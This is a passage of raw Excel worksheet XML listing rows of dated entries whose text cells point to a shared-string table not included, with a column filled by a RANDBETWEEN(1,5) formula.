    <row r="10305" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A10305" s="1">
        <v>43341.134768518517</v>
      </c>
      <c r="C10305" t="s">
        <v>65</v>
      </c>
      <c r="D10305" t="s">
        <v>312</v>
      </c>
      <c r="E10305" s="2" t="s">
        <v>9211</v>
      </c>
      <c r="F10305">
        <f t="shared" ca="1" si="160"/>
        <v>1</v>
      </c>
    </row>
    <row r="10306" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A10306" s="1">
        <v>43341.133611111109</v>
      </c>
      <c r="C10306" t="s">
        <v>140</v>
      </c>
      <c r="D10306" t="s">
        <v>312</v>
      </c>
      <c r="E10306" s="2" t="s">
        <v>9212</v>
      </c>
      <c r="F10306">
        <f t="shared" ref="F10306:F10369" ca="1" si="161">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="10307" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A10307" s="1">
        <v>43341.12054398148</v>
      </c>
      <c r="C10307" t="s">
        <v>10</v>
      </c>
      <c r="D10307" t="s">
        <v>713</v>
      </c>
      <c r="E10307" s="2" t="s">
        <v>5721</v>
      </c>
      <c r="F10307">
        <f t="shared" ca="1" si="161"/>
        <v>2</v>
      </c>
    </row>
    <row r="10308" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A10308" s="1">
        <v>43341.031851851854</v>
      </c>
      <c r="C10308" t="s">
        <v>134</v>
      </c>
      <c r="E10308" s="2" t="s">
        <v>9213</v>
      </c>
      <c r="F10308">
        <f t="shared" ca="1" si="161"/>
        <v>1</v>
      </c>
    </row>
    <row r="10309" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A10309" s="1">
        <v>43340.871851851851</v>
      </c>
      <c r="C10309" t="s">
        <v>140</v>
      </c>
      <c r="D10309" t="s">
        <v>847</v>
      </c>
      <c r="E10309" s="2" t="s">
        <v>9214</v>
      </c>
      <c r="F10309">
        <f t="shared" ca="1" si="161"/>
        <v>1</v>
      </c>
    </row>
    <row r="10310" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A10310" s="1">
        <v>43340.826874999999</v>
      </c>
      <c r="C10310" t="s">
        <v>6</v>
      </c>
      <c r="D10310" t="s">
        <v>821</v>
      </c>
      <c r="E10310" s="2" t="s">
        <v>9215</v>
      </c>
      <c r="F10310">
        <f t="shared" ca="1" si="161"/>
        <v>1</v>
      </c>
    </row>
    <row r="10311" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10311" s="1">
        <v>43340.808425925927</v>
      </c>
      <c r="C10311" t="s">
        <v>10</v>
      </c>
      <c r="D10311" t="s">
        <v>6</v>
      </c>
      <c r="E10311" t="s">
        <v>9216</v>
      </c>
      <c r="F10311">
        <f t="shared" ca="1" si="161"/>
        <v>5</v>
      </c>
    </row>
    <row r="10312" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A10312" s="1">
        <v>43340.788032407407</v>
      </c>
      <c r="C10312" t="s">
        <v>189</v>
      </c>
      <c r="E10312" s="2" t="s">
        <v>9217</v>
      </c>
      <c r="F10312">
        <f t="shared" ca="1" si="161"/>
        <v>4</v>
      </c>
    </row>
    <row r="10313" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10313" s="1">
        <v>43340.745474537034</v>
      </c>
      <c r="C10313" t="s">
        <v>10</v>
      </c>
      <c r="D10313" t="s">
        <v>94</v>
      </c>
      <c r="E10313" t="s">
        <v>9218</v>
      </c>
      <c r="F10313">
        <f t="shared" ca="1" si="161"/>
        <v>5</v>
      </c>
    </row>
    <row r="10314" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A10314" s="1">
        <v>43340.722534722219</v>
      </c>
      <c r="C10314" t="s">
        <v>10</v>
      </c>
      <c r="D10314" t="s">
        <v>36</v>
      </c>
      <c r="E10314" s="2" t="s">
        <v>9219</v>
      </c>
      <c r="F10314">
        <f t="shared" ca="1" si="161"/>
        <v>2</v>
      </c>
    </row>
    <row r="10315" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10315" s="1">
        <v>43340.71733796296</v>
      </c>
      <c r="C10315" t="s">
        <v>10</v>
      </c>
      <c r="D10315" t="s">
        <v>80</v>
      </c>
      <c r="E10315" s="2" t="s">
        <v>9220</v>
      </c>
      <c r="F10315">
        <f t="shared" ca="1" si="161"/>
        <v>4</v>
      </c>
    </row>
    <row r="10316" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10316" s="1">
        <v>43340.705474537041</v>
      </c>
      <c r="C10316" t="s">
        <v>10</v>
      </c>
      <c r="D10316" t="s">
        <v>89</v>
      </c>
      <c r="E10316" t="s">
        <v>9221</v>
      </c>
      <c r="F10316">
        <f t="shared" ca="1" si="161"/>
        <v>3</v>
      </c>
    </row>
    <row r="10317" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10317" s="1">
        <v>43340.683553240742</v>
      </c>
      <c r="C10317" t="s">
        <v>10</v>
      </c>
      <c r="D10317" t="s">
        <v>178</v>
      </c>
      <c r="E10317" t="s">
        <v>9222</v>
      </c>
      <c r="F10317">
        <f t="shared" ca="1" si="161"/>
        <v>4</v>
      </c>
    </row>
    <row r="10318" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10318" s="1">
        <v>43340.670567129629</v>
      </c>
      <c r="C10318" t="s">
        <v>10</v>
      </c>
      <c r="D10318" t="s">
        <v>271</v>
      </c>
      <c r="E10318" t="s">
        <v>9223</v>
      </c>
      <c r="F10318">
        <f t="shared" ca="1" si="161"/>
        <v>1</v>
      </c>
    </row>
    <row r="10319" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10319" s="1">
        <v>43340.620115740741</v>
      </c>
      <c r="C10319" t="s">
        <v>10</v>
      </c>
      <c r="D10319" t="s">
        <v>6</v>
      </c>
      <c r="E10319" s="2" t="s">
        <v>9224</v>
      </c>
      <c r="F10319">
        <f t="shared" ca="1" si="161"/>
        <v>3</v>
      </c>
    </row>
    <row r="10320" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A10320" s="1">
        <v>43340.616423611114</v>
      </c>
      <c r="C10320" t="s">
        <v>6</v>
      </c>
      <c r="D10320" t="s">
        <v>25</v>
      </c>
      <c r="E10320" s="2" t="s">
        <v>9225</v>
      </c>
      <c r="F10320">
        <f t="shared" ca="1" si="161"/>
        <v>4</v>
      </c>
    </row>
    <row r="10321" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A10321" s="1">
        <v>43340.616388888891</v>
      </c>
      <c r="C10321" t="s">
        <v>6</v>
      </c>
      <c r="D10321" t="s">
        <v>25</v>
      </c>
      <c r="E10321" s="2" t="s">
        <v>9225</v>
      </c>
      <c r="F10321">
        <f t="shared" ca="1" si="161"/>
        <v>1</v>
      </c>
    </row>
    <row r="10322" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A10322" s="1">
        <v>43340.579687500001</v>
      </c>
      <c r="C10322" t="s">
        <v>10</v>
      </c>
      <c r="D10322" t="s">
        <v>80</v>
      </c>
      <c r="E10322" s="2" t="s">
        <v>9226</v>
      </c>
      <c r="F10322">
        <f t="shared" ca="1" si="161"/>
        <v>3</v>
      </c>
    </row>
    <row r="10323" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10323" s="1">
        <v>43340.563726851855</v>
      </c>
      <c r="C10323" t="s">
        <v>10</v>
      </c>
      <c r="D10323" t="s">
        <v>36</v>
      </c>
      <c r="E10323" t="s">
        <v>9227</v>
      </c>
      <c r="F10323">
        <f t="shared" ca="1" si="161"/>
        <v>1</v>
      </c>
    </row>
    <row r="10324" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10324" s="1">
        <v>43340.547164351854</v>
      </c>
      <c r="C10324" t="s">
        <v>10</v>
      </c>
      <c r="D10324" t="s">
        <v>1160</v>
      </c>
      <c r="E10324" t="s">
        <v>9228</v>
      </c>
      <c r="F10324">
        <f t="shared" ca="1" si="161"/>
        <v>1</v>
      </c>
    </row>
    <row r="10325" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10325" s="1">
        <v>43340.520486111112</v>
      </c>
      <c r="C10325" t="s">
        <v>10</v>
      </c>
      <c r="D10325" t="s">
        <v>1091</v>
      </c>
      <c r="E10325" t="s">
        <v>9229</v>
      </c>
      <c r="F10325">
        <f t="shared" ca="1" si="161"/>
        <v>2</v>
      </c>
    </row>
    <row r="10326" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10326" s="1">
        <v>43340.52034722222</v>
      </c>
      <c r="C10326" t="s">
        <v>10</v>
      </c>
      <c r="D10326" t="s">
        <v>36</v>
      </c>
      <c r="E10326" t="s">
        <v>9230</v>
      </c>
      <c r="F10326">
        <f t="shared" ca="1" si="161"/>
        <v>5</v>
      </c>
    </row>
    <row r="10327" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10327" s="1">
        <v>43340.518761574072</v>
      </c>
      <c r="C10327" t="s">
        <v>2545</v>
      </c>
      <c r="E10327" t="s">
        <v>9231</v>
      </c>
      <c r="F10327">
        <f t="shared" ca="1" si="161"/>
        <v>1</v>
      </c>
    </row>
    <row r="10328" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10328" s="1">
        <v>43340.499027777776</v>
      </c>
      <c r="C10328" t="s">
        <v>48</v>
      </c>
      <c r="E10328" t="s">
        <v>9232</v>
      </c>
      <c r="F10328">
        <f t="shared" ca="1" si="161"/>
        <v>1</v>
      </c>
    </row>
    <row r="10329" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10329" s="1">
        <v>43340.488692129627</v>
      </c>
      <c r="C10329" t="s">
        <v>48</v>
      </c>
      <c r="E10329" t="s">
        <v>9233</v>
      </c>
      <c r="F10329">
        <f t="shared" ca="1" si="161"/>
        <v>1</v>
      </c>
    </row>
    <row r="10330" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10330" s="1">
        <v>43340.481851851851</v>
      </c>
      <c r="C10330" t="s">
        <v>10</v>
      </c>
      <c r="D10330" t="s">
        <v>494</v>
      </c>
      <c r="E10330" t="s">
        <v>9234</v>
      </c>
      <c r="F10330">
        <f t="shared" ca="1" si="161"/>
        <v>4</v>
      </c>
    </row>
    <row r="10331" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10331" s="1">
        <v>43340.480671296296</v>
      </c>
      <c r="C10331" t="s">
        <v>10</v>
      </c>
      <c r="D10331" t="s">
        <v>6</v>
      </c>
      <c r="E10331" t="s">
        <v>9235</v>
      </c>
      <c r="F10331">
        <f t="shared" ca="1" si="161"/>
        <v>2</v>
      </c>
    </row>
    <row r="10332" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10332" s="1">
        <v>43340.466307870367</v>
      </c>
      <c r="C10332" t="s">
        <v>10</v>
      </c>
      <c r="D10332" t="s">
        <v>36</v>
      </c>
      <c r="E10332" t="s">
        <v>9236</v>
      </c>
      <c r="F10332">
        <f t="shared" ca="1" si="161"/>
        <v>1</v>
      </c>
    </row>
    <row r="10333" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10333" s="1">
        <v>43340.466111111113</v>
      </c>
      <c r="C10333" t="s">
        <v>10</v>
      </c>
      <c r="D10333" t="s">
        <v>290</v>
      </c>
      <c r="E10333" t="s">
        <v>9237</v>
      </c>
      <c r="F10333">
        <f t="shared" ca="1" si="161"/>
        <v>2</v>
      </c>
    </row>
    <row r="10334" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10334" s="1">
        <v>43340.463310185187</v>
      </c>
      <c r="C10334" t="s">
        <v>10</v>
      </c>
      <c r="E10334" t="s">
        <v>9238</v>
      </c>
      <c r="F10334">
        <f t="shared" ca="1" si="161"/>
        <v>3</v>
      </c>
    </row>
    <row r="10335" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10335" s="1">
        <v>43340.463263888887</v>
      </c>
      <c r="C10335" t="s">
        <v>10</v>
      </c>
      <c r="E10335" t="s">
        <v>9238</v>
      </c>
      <c r="F10335">
        <f t="shared" ca="1" si="161"/>
        <v>5</v>
      </c>
    </row>
    <row r="10336" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A10336" s="1">
        <v>43340.461539351854</v>
      </c>
      <c r="C10336" t="s">
        <v>140</v>
      </c>
      <c r="D10336" t="s">
        <v>141</v>
      </c>
      <c r="E10336" s="2" t="s">
        <v>9239</v>
      </c>
      <c r="F10336">
        <f t="shared" ca="1" si="161"/>
        <v>1</v>
      </c>
    </row>
    <row r="10337" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10337" s="1">
        <v>43340.459270833337</v>
      </c>
      <c r="C10337" t="s">
        <v>10</v>
      </c>
      <c r="D10337" t="s">
        <v>667</v>
      </c>
      <c r="E10337" t="s">
        <v>9240</v>
      </c>
      <c r="F10337">
        <f t="shared" ca="1" si="161"/>
        <v>4</v>
      </c>
    </row>
    <row r="10338" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10338" s="1">
        <v>43340.449004629627</v>
      </c>
      <c r="C10338" t="s">
        <v>48</v>
      </c>
      <c r="E10338" t="s">
        <v>9241</v>
      </c>
      <c r="F10338">
        <f t="shared" ca="1" si="161"/>
        <v>3</v>
      </c>
    </row>
    <row r="10339" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10339" s="1">
        <v>43340.446828703702</v>
      </c>
      <c r="C10339" t="s">
        <v>10</v>
      </c>
      <c r="D10339" t="s">
        <v>290</v>
      </c>
      <c r="E10339" t="s">
        <v>9242</v>
      </c>
      <c r="F10339">
        <f t="shared" ca="1" si="161"/>
        <v>4</v>
      </c>
    </row>
    <row r="10340" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10340" s="1">
        <v>43340.433518518519</v>
      </c>
      <c r="C10340" t="s">
        <v>6</v>
      </c>
      <c r="D10340" t="s">
        <v>25</v>
      </c>
      <c r="E10340" t="s">
        <v>9243</v>
      </c>
      <c r="F10340">
        <f t="shared" ca="1" si="161"/>
        <v>4</v>
      </c>
    </row>
    <row r="10341" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A10341" s="1">
        <v>43340.429039351853</v>
      </c>
      <c r="C10341" t="s">
        <v>10</v>
      </c>
      <c r="D10341" t="s">
        <v>41</v>
      </c>
      <c r="E10341" s="2" t="s">
        <v>9244</v>
      </c>
      <c r="F10341">
        <f t="shared" ca="1" si="161"/>
        <v>2</v>
      </c>
    </row>
    <row r="10342" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A10342" s="1">
        <v>43340.406574074077</v>
      </c>
      <c r="C10342" t="s">
        <v>339</v>
      </c>
      <c r="E10342" s="2" t="s">
        <v>9245</v>
      </c>
      <c r="F10342">
        <f t="shared" ca="1" si="161"/>
        <v>3</v>
      </c>
    </row>
    <row r="10343" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A10343" s="1">
        <v>43340.403263888889</v>
      </c>
      <c r="C10343" t="s">
        <v>6523</v>
      </c>
      <c r="E10343" s="2" t="s">
        <v>9246</v>
      </c>
      <c r="F10343">
        <f t="shared" ca="1" si="161"/>
        <v>3</v>
      </c>
    </row>
    <row r="10344" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10344" s="1">
        <v>43340.391111111108</v>
      </c>
      <c r="C10344" t="s">
        <v>10</v>
      </c>
      <c r="D10344" t="s">
        <v>14</v>
      </c>
      <c r="E10344" t="s">
        <v>9247</v>
      </c>
      <c r="F10344">
        <f t="shared" ca="1" si="161"/>
        <v>3</v>
      </c>
    </row>
    <row r="10345" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A10345" s="1">
        <v>43340.379756944443</v>
      </c>
      <c r="C10345" t="s">
        <v>10</v>
      </c>
      <c r="D10345" t="s">
        <v>112</v>
      </c>
      <c r="E10345" s="2" t="s">
        <v>9248</v>
      </c>
      <c r="F10345">
        <f t="shared" ca="1" si="161"/>
        <v>3</v>
      </c>
    </row>
    <row r="10346" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10346" s="1">
        <v>43340.370567129627</v>
      </c>
      <c r="C10346" t="s">
        <v>48</v>
      </c>
      <c r="E10346" t="s">
        <v>9249</v>
      </c>
      <c r="F10346">
        <f t="shared" ca="1" si="161"/>
        <v>5</v>
      </c>
    </row>
    <row r="10347" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10347" s="1">
        <v>43340.365081018521</v>
      </c>
      <c r="C10347" t="s">
        <v>10</v>
      </c>
      <c r="D10347" t="s">
        <v>20</v>
      </c>
      <c r="E10347" t="s">
        <v>9250</v>
      </c>
      <c r="F10347">
        <f t="shared" ca="1" si="161"/>
        <v>5</v>
      </c>
    </row>
    <row r="10348" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A10348" s="1">
        <v>43340.360636574071</v>
      </c>
      <c r="C10348" t="s">
        <v>173</v>
      </c>
      <c r="E10348" s="2" t="s">
        <v>9251</v>
      </c>
      <c r="F10348">
        <f t="shared" ca="1" si="161"/>
        <v>4</v>
      </c>
    </row>
    <row r="10349" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10349" s="1">
        <v>43340.360590277778</v>
      </c>
      <c r="C10349" t="s">
        <v>48</v>
      </c>
      <c r="E10349" t="s">
        <v>9252</v>
      </c>
      <c r="F10349">
        <f t="shared" ca="1" si="161"/>
        <v>5</v>
      </c>
    </row>
    <row r="10350" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10350" s="1">
        <v>43340.347592592596</v>
      </c>
      <c r="C10350" t="s">
        <v>10</v>
      </c>
      <c r="D10350" t="s">
        <v>80</v>
      </c>
      <c r="E10350" t="s">
        <v>9253</v>
      </c>
      <c r="F10350">
        <f t="shared" ca="1" si="161"/>
        <v>5</v>
      </c>
    </row>
    <row r="10351" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A10351" s="1">
        <v>43340.343356481484</v>
      </c>
      <c r="C10351" t="s">
        <v>65</v>
      </c>
      <c r="E10351" s="2" t="s">
        <v>9254</v>
      </c>
      <c r="F10351">
        <f t="shared" ca="1" si="161"/>
        <v>5</v>
      </c>
    </row>
    <row r="10352" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10352" s="1">
        <v>43340.298263888886</v>
      </c>
      <c r="C10352" t="s">
        <v>173</v>
      </c>
      <c r="E10352" t="s">
        <v>9255</v>
      </c>
      <c r="F10352">
        <f t="shared" ca="1" si="161"/>
        <v>4</v>
      </c>
    </row>
    <row r="10353" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A10353" s="1">
        <v>43340.287141203706</v>
      </c>
      <c r="C10353" t="s">
        <v>10</v>
      </c>
      <c r="D10353" t="s">
        <v>41</v>
      </c>
      <c r="E10353" s="2" t="s">
        <v>6131</v>
      </c>
      <c r="F10353">
        <f t="shared" ca="1" si="161"/>
        <v>2</v>
      </c>
    </row>
    <row r="10354" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10354" s="1">
        <v>43340.281967592593</v>
      </c>
      <c r="C10354" t="s">
        <v>41</v>
      </c>
      <c r="E10354" t="s">
        <v>9256</v>
      </c>
      <c r="F10354">
        <f t="shared" ca="1" si="161"/>
        <v>3</v>
      </c>
    </row>
    <row r="10355" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10355" s="1">
        <v>43340.278321759259</v>
      </c>
      <c r="C10355" t="s">
        <v>2745</v>
      </c>
      <c r="D10355" t="s">
        <v>7</v>
      </c>
      <c r="E10355" t="s">
        <v>9257</v>
      </c>
      <c r="F10355">
        <f t="shared" ca="1" si="161"/>
        <v>4</v>
      </c>
    </row>
    <row r="10356" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10356" s="1">
        <v>43340.257175925923</v>
      </c>
      <c r="C10356" t="s">
        <v>41</v>
      </c>
      <c r="E10356" t="s">
        <v>9258</v>
      </c>
      <c r="F10356">
        <f t="shared" ca="1" si="161"/>
        <v>5</v>
      </c>
    </row>
    <row r="10357" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10357" s="1">
        <v>43340.251712962963</v>
      </c>
      <c r="C10357" t="s">
        <v>41</v>
      </c>
      <c r="E10357" s="2" t="s">
        <v>9259</v>
      </c>
      <c r="F10357">
        <f t="shared" ca="1" si="161"/>
        <v>3</v>
      </c>
    </row>
    <row r="10358" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10358" s="1">
        <v>43340.237071759257</v>
      </c>
      <c r="C10358" t="s">
        <v>461</v>
      </c>
      <c r="E10358" t="s">
        <v>9260</v>
      </c>
      <c r="F10358">
        <f t="shared" ca="1" si="161"/>
        <v>5</v>
      </c>
    </row>
    <row r="10359" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A10359" s="1">
        <v>43340.218865740739</v>
      </c>
      <c r="C10359" t="s">
        <v>477</v>
      </c>
      <c r="E10359" s="2" t="s">
        <v>9261</v>
      </c>
      <c r="F10359">
        <f t="shared" ca="1" si="161"/>
        <v>2</v>
      </c>
    </row>
    <row r="10360" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A10360" s="1">
        <v>43340.215092592596</v>
      </c>
      <c r="C10360" t="s">
        <v>124</v>
      </c>
      <c r="E10360" s="2" t="s">
        <v>9262</v>
      </c>
      <c r="F10360">
        <f t="shared" ca="1" si="161"/>
        <v>2</v>
      </c>
    </row>
    <row r="10361" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A10361" s="1">
        <v>43340.209178240744</v>
      </c>
      <c r="C10361" t="s">
        <v>344</v>
      </c>
      <c r="E10361" s="2" t="s">
        <v>9263</v>
      </c>
      <c r="F10361">
        <f t="shared" ca="1" si="161"/>
        <v>4</v>
      </c>
    </row>
    <row r="10362" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10362" s="1">
        <v>43340.091145833336</v>
      </c>
      <c r="C10362" t="s">
        <v>41</v>
      </c>
      <c r="E10362" t="s">
        <v>9264</v>
      </c>
      <c r="F10362">
        <f t="shared" ca="1" si="161"/>
        <v>2</v>
      </c>
    </row>
    <row r="10363" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10363" s="1">
        <v>43340.06858796296</v>
      </c>
      <c r="C10363" t="s">
        <v>430</v>
      </c>
      <c r="E10363" t="s">
        <v>9265</v>
      </c>
      <c r="F10363">
        <f t="shared" ca="1" si="161"/>
        <v>5</v>
      </c>
    </row>
    <row r="10364" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A10364" s="1">
        <v>43340.037303240744</v>
      </c>
      <c r="C10364" t="s">
        <v>41</v>
      </c>
      <c r="E10364" s="2" t="s">
        <v>9266</v>
      </c>
      <c r="F10364">
        <f t="shared" ca="1" si="161"/>
        <v>3</v>
      </c>
    </row>
    <row r="10365" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10365" s="1">
        <v>43339.989687499998</v>
      </c>
      <c r="C10365" t="s">
        <v>3443</v>
      </c>
      <c r="E10365" t="s">
        <v>9267</v>
      </c>
      <c r="F10365">
        <f t="shared" ca="1" si="161"/>
        <v>5</v>
      </c>
    </row>
    <row r="10366" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10366" s="1">
        <v>43339.937835648147</v>
      </c>
      <c r="C10366" t="s">
        <v>140</v>
      </c>
      <c r="D10366" t="s">
        <v>141</v>
      </c>
      <c r="E10366" t="s">
        <v>9268</v>
      </c>
      <c r="F10366">
        <f t="shared" ca="1" si="161"/>
        <v>3</v>
      </c>
    </row>
    <row r="10367" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10367" s="1">
        <v>43339.930995370371</v>
      </c>
      <c r="C10367" t="s">
        <v>140</v>
      </c>
      <c r="D10367" t="s">
        <v>312</v>
      </c>
      <c r="E10367" s="2" t="s">
        <v>9269</v>
      </c>
      <c r="F10367">
        <f t="shared" ca="1" si="161"/>
        <v>4</v>
      </c>
    </row>
    <row r="10368" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10368" s="1">
        <v>43339.869432870371</v>
      </c>
      <c r="C10368" t="s">
        <v>10</v>
      </c>
      <c r="D10368" t="s">
        <v>23</v>
      </c>
      <c r="E10368" t="s">
        <v>9270</v>
      </c>
      <c r="F10368">
        <f t="shared" ca="1" si="161"/>
        <v>5</v>
      </c>
    </row>
    <row r="10369" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10369" s="1">
        <v>43339.805856481478</v>
      </c>
      <c r="C10369" t="s">
        <v>10</v>
      </c>
      <c r="D10369" t="s">
        <v>271</v>
      </c>
      <c r="E10369" t="s">
        <v>9271</v>
      </c>
      <c r="F10369">
        <f t="shared" ca="1" si="161"/>
        <v>5</v>
      </c>
    </row>
    <row r="10370" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10370" s="1">
        <v>43339.782592592594</v>
      </c>
      <c r="C10370" t="s">
        <v>10</v>
      </c>
      <c r="D10370" t="s">
        <v>6</v>
      </c>
      <c r="E10370" t="s">
        <v>9272</v>
      </c>
      <c r="F10370">
        <f t="shared" ref="F10370:F10433" ca="1" si="162">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="10371" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10371" s="1">
        <v>43339.685497685183</v>
      </c>
      <c r="C10371" t="s">
        <v>10</v>
      </c>
      <c r="D10371" t="s">
        <v>290</v>
      </c>
      <c r="E10371" t="s">
        <v>9273</v>
      </c>
      <c r="F10371">
        <f t="shared" ca="1" si="162"/>
        <v>1</v>
      </c>
    </row>
    <row r="10372" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10372" s="1">
        <v>43339.684398148151</v>
      </c>
      <c r="C10372" t="s">
        <v>10</v>
      </c>
      <c r="D10372" t="s">
        <v>263</v>
      </c>
      <c r="E10372" t="s">
        <v>9274</v>
      </c>
      <c r="F10372">
        <f t="shared" ca="1" si="162"/>
        <v>1</v>
      </c>
    </row>
    <row r="10373" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A10373" s="1">
        <v>43339.680462962962</v>
      </c>
      <c r="C10373" t="s">
        <v>10</v>
      </c>
      <c r="D10373" t="s">
        <v>36</v>
      </c>
      <c r="E10373" s="2" t="s">
        <v>9275</v>
      </c>
      <c r="F10373">
        <f t="shared" ca="1" si="162"/>
        <v>4</v>
      </c>
    </row>
    <row r="10374" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A10374" s="1">
        <v>43339.670486111114</v>
      </c>
      <c r="C10374" t="s">
        <v>743</v>
      </c>
      <c r="E10374" s="2" t="s">
        <v>9276</v>
      </c>
      <c r="F10374">
        <f t="shared" ca="1" si="162"/>
        <v>4</v>
      </c>
    </row>
    <row r="10375" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10375" s="1">
        <v>43339.654467592591</v>
      </c>
      <c r="C10375" t="s">
        <v>10</v>
      </c>
      <c r="D10375" t="s">
        <v>36</v>
      </c>
      <c r="E10375" t="s">
        <v>9277</v>
      </c>
      <c r="F10375">
        <f t="shared" ca="1" si="162"/>
        <v>2</v>
      </c>
    </row>
    <row r="10376" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10376" s="1">
        <v>43339.616377314815</v>
      </c>
      <c r="C10376" t="s">
        <v>10</v>
      </c>
      <c r="D10376" t="s">
        <v>23</v>
      </c>
      <c r="E10376" t="s">
        <v>9278</v>
      </c>
      <c r="F10376">
        <f t="shared" ca="1" si="162"/>
        <v>5</v>
      </c>
    </row>
    <row r="10377" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10377" s="1">
        <v>43339.60125</v>
      </c>
      <c r="C10377" t="s">
        <v>10</v>
      </c>
      <c r="D10377" t="s">
        <v>229</v>
      </c>
      <c r="E10377" t="s">
        <v>9279</v>
      </c>
      <c r="F10377">
        <f t="shared" ca="1" si="162"/>
        <v>4</v>
      </c>
    </row>
    <row r="10378" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A10378" s="1">
        <v>43339.585590277777</v>
      </c>
      <c r="C10378" t="s">
        <v>10</v>
      </c>
      <c r="D10378" t="s">
        <v>290</v>
      </c>
      <c r="E10378" s="2" t="s">
        <v>9280</v>
      </c>
      <c r="F10378">
        <f t="shared" ca="1" si="162"/>
        <v>2</v>
      </c>
    </row>
    <row r="10379" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10379" s="1">
        <v>43339.570486111108</v>
      </c>
      <c r="C10379" t="s">
        <v>10</v>
      </c>
      <c r="D10379" t="s">
        <v>6</v>
      </c>
      <c r="E10379" t="s">
        <v>9281</v>
      </c>
      <c r="F10379">
        <f t="shared" ca="1" si="162"/>
        <v>1</v>
      </c>
    </row>
    <row r="10380" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A10380" s="1">
        <v>43339.569432870368</v>
      </c>
      <c r="C10380" t="s">
        <v>45</v>
      </c>
      <c r="E10380" s="2" t="s">
        <v>9282</v>
      </c>
      <c r="F10380">
        <f t="shared" ca="1" si="162"/>
        <v>5</v>
      </c>
    </row>
    <row r="10381" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A10381" s="1">
        <v>43339.56653935185</v>
      </c>
      <c r="C10381" t="s">
        <v>10</v>
      </c>
      <c r="D10381" t="s">
        <v>6</v>
      </c>
      <c r="E10381" s="2" t="s">
        <v>9283</v>
      </c>
      <c r="F10381">
        <f t="shared" ca="1" si="162"/>
        <v>1</v>
      </c>
    </row>
    <row r="10382" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10382" s="1">
        <v>43339.565729166665</v>
      </c>
      <c r="C10382" t="s">
        <v>41</v>
      </c>
      <c r="E10382" t="s">
